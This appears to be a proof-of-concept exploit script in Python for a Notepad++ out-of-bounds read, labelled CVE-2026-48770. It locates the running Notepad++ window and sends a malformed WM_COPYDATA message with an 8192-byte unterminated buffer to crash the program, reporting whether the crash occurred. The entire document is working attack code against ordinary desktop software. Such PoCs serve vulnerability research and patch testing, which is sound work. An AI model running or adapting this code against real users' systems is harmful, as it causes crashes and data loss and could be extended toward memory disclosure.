#!/usr/bin/env python3
# CVE-2026-48770 - Notepad++ OOB Read via WM_COPYDATA (crash PoC)
import ctypes
import ctypes.wintypes
import sys

WM_COPYDATA = 0x004A
SMTO_ABORTIFHUNG = 0x0002

class COPYDATASTRUCT(ctypes.Structure):
    _fields_ = [
        ("dwData", ctypes.wintypes.LPARAM),
        ("cbData", ctypes.wintypes.DWORD),
        ("lpData", ctypes.c_void_p),
    ]

user32 = ctypes.windll.user32

hwnd = user32.FindWindowW("Notepad++", None)
if not hwnd:
    print("[-] Notepad++ not found - open it first")
    sys.exit(1)
print(f"[+] Found Notepad++ HWND: 0x{hwnd:08X}")

cbData = 8192
buf = ctypes.create_string_buffer(b"\x41" * cbData)  # no NUL terminator

cds = COPYDATASTRUCT()
cds.dwData = 3
cds.cbData = cbData
cds.lpData = ctypes.cast(buf, ctypes.c_void_p).value

print(f"[*] Sending malformed WM_COPYDATA (dwData=3, cbData={cbData}, no NUL terminator)...")

result = ctypes.wintypes.DWORD(0)
ret = user32.SendMessageTimeoutW(
    hwnd, WM_COPYDATA, 0, ctypes.byref(cds),
    SMTO_ABORTIFHUNG, 2000, ctypes.byref(result)
)

if ret == 0:
    print("[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)")
else:
    print(f"[-] No crash (ret={ret}) - may be patched")